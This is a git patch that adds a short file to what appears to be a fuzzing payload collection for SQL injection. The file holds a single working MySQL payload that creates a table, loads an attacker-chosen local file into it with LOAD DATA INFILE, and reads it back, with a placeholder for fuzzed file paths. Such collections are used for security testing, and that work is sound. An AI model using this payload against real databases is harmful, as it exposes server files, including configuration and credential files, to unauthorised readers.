From fe9b041b0d1735aaace793dc6cfa211bcf51cb43 Mon Sep 17 00:00:00 2001
From: unix23 <unix23@389a61cb-3542-a87d-fe93-12be81370f99>
Date: Thu, 22 Apr 2010 19:51:50 +0000
Subject: [PATCH] sqli attacks

---
 .../sql-injection/exploit/mysql-read-local-files.txt           | 3 +++
 1 file changed, 3 insertions(+)
 create mode 100644 attack-payloads/sql-injection/exploit/mysql-read-local-files.txt

diff --git a/attack-payloads/sql-injection/exploit/mysql-read-local-files.txt b/attack-payloads/sql-injection/exploit/mysql-read-local-files.txt
new file mode 100644
index 0000000..aeb89ca
--- /dev/null
+++ b/attack-payloads/sql-injection/exploit/mysql-read-local-files.txt
@@ -0,0 +1,3 @@
+# mysql local file disclosure through sqli
+# fuzz interesting absolute filepath/filename into <filepath>
+create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;